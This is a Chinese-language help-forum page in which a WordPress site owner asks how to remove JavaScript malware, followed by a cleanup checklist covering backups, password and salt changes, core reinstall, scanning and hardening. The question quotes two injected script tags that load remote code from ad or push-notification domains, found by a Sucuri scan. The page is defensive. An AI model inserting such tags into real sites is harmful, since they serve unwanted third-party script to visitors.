如何删除WordPress站点中的Java脚本恶意软件

时间:2019-08-14 作者:Anh Kim

这是我的网站-(出于安全原因,使用XSS漏洞中的恶意软件编辑了网站URL)

我在wordpress中创建了这个网站,在谷歌广告停止并警告我之后,我突然意识到我的网站中存在恶意软件。

以下是sucuri sitecheck发现的恶意软件。

<script type="text/javascript" src="//deloplen.com/apu.php?zoneid=2694107" async data-cfasync="false"></script> 
<script src="//pushlaram.com/ntfc.php?p=2694112" data-cfasync="false" async></script>

1 个回复
最合适的回答,由SO网友:WSU 整理而成

备份您留下的所有内容,尤其是数据库和wp content文件夹。有些主机只是简单地删除被黑客攻击的网站,你不想因此失去你的全部工作。

与您的托管公司交谈。高质量的提供商手头有熟悉托管环境的工作人员,他们可能能够为您解决问题。此外,黑客攻击可能是由于服务器不安全,因此他们需要解决这一问题。

扫描您的本地计算机,确保黑客不是来自那里。

从备份还原。如果您的站点有一个完整的备份,请返回该版本,并遵循以下建议,通过密码更改、更新和额外强化锁定您的站点。如果没有,请继续。

将所有密码更改到后端,并强制所有其他管理员用户执行相同操作,例如通过https://wordpress.org/plugins/expire-passwords/. 当你在做的时候,检查你的网站上是否有不属于那里的用户。

安装https://wordpress.org/plugins/sucuri-scanner/ 并让它扫描所有WordPress核心文件的完整性。或者,使用下面的外部扫描仪。

用原始文件替换受损文件。最简单的方法通常是简单地重新安装WordPress。您可以从后端或手动执行此操作。更新插件和主题。删除不使用的内容。

更换wp配置内的盐。php。https://api.wordpress.org/secret-key/1.1/salt/

再次更改密码和所有其他重要凭据:主机帐户登录、FTP登录、MySQL数据库密码、管理员电子邮件地址密码。

实施额外的安全措施:https://wordpress.org/support/article/hardening-wordpress/

重新运行安全检查,这样您就知道没有遗漏任何内容。

外部扫描仪:

相关推荐

security issue in wordpress?

我已在中安装wordpresswww.mysite.com/user 现在假设有人熟悉wordpress,他/她可以通过www.mysite.com/user/memberswww.mysite.com/user/groups 甚至他都能看到www.mysite.com/user 没有登录到我的网站。有什么方法可以防止这种情况发生吗。类似于如果他没有登录或任何类型的重定向到特定url,访问就会被拒绝。或者你没有权限访问/members/ 在此服务器上。因此,我面临着很多问题。我使用frisco作为budd